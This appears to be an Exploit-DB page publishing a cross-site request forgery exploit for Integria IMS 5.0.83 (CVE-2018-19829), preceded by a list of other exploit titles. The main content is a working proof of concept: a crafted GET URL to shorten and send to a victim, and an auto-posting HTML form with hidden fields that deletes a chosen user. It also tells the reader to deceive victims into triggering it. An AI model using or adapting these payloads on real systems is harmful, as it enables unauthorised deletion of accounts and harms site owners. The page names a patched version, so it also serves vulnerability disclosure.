
12 changes to exploits/shellcodes MiniShare Server 1.3.2 - Remote Denial of Service MiniShare 1.3.2 - Remote Denial of Service MiniShare 1.5.5 - Local Buffer Overflow (SEH) MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH) Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure PassFab RAR 9.3.2 - Buffer Overflow (SEH) LanSpy 2.0.1.159 - Local Buffer Overflow PDF Explorer 1.5.66.2 - Buffer Overflow (SEH) MiniShare HTTP 1.5.5 - Remote Buffer Overflow MiniShare 1.5.5 - Remote Buffer Overflow MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password) Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit) Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting Integria IMS 5.0.83 - Cross-Site Request Forgery Bolt CMS < 3.6.2 - Cross-Site Scripting Yeswiki Cercopitheque - 'id' SQL Injection IBM Operational Decision Manager 8.x - XML External Entity Injection Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)
41 lines
No EOL
1.5 KiB
HTML
41 lines
No EOL
1.5 KiB
HTML
# Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery
|
|
# Exploit Author: Javier Olmedo
|
|
# Website: https://hackpuntes.com
|
|
# Date: 2018-12-19
|
|
# Google Dork: N/A
|
|
# Vendor: Artica ST
|
|
# Software Link: https://github.com/articaST/integriaims
|
|
# Affected Version: 5.0.83 and possibly before
|
|
# Patched Version: 5.0.84
|
|
# Category: Web Application
|
|
# Platform: Windows & Ubuntu
|
|
# Tested on: Win10x64 & Kali Linux
|
|
# CVE: 2018-19829
|
|
# References:
|
|
# https://hackpuntes.com/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/
|
|
# https://github.com/articaST/integriaims/commit/a37c0c3d7cad74df64bfd3d98488aee4fa28b839
|
|
|
|
# 1. Technical Description:
|
|
# Integria IMS version 5.0.83 and possibly before are affected by Cross-Site Request Forgery
|
|
# vulnerability, an attacker could delete users through GET or POST requests.
|
|
|
|
# 2.1 Proof Of Concept (Delete User):
|
|
|
|
(Method 1 - GET)
|
|
Use Google URL Shortener (or similar) to shorten the next url
|
|
http://[PATH]/ajax.php?page=include/ajax/delete_item_general&delete_item=1&name=delete_user&id=[ID])
|
|
and send it to the victim.
|
|
|
|
(Method 2 - POST)
|
|
Use next form and send it tho the victim.
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://[PATH]/index.php">
|
|
<input type="hidden" name="sec" value="users" />
|
|
<input type="hidden" name="sec2" value="godmode/usuarios/lista_usuarios" />
|
|
<input type="hidden" name="borrar_usuario" value="[ID]" />
|
|
<input type="submit" value="Delete user" />
|
|
</form>
|
|
</body>
|
|
</html> |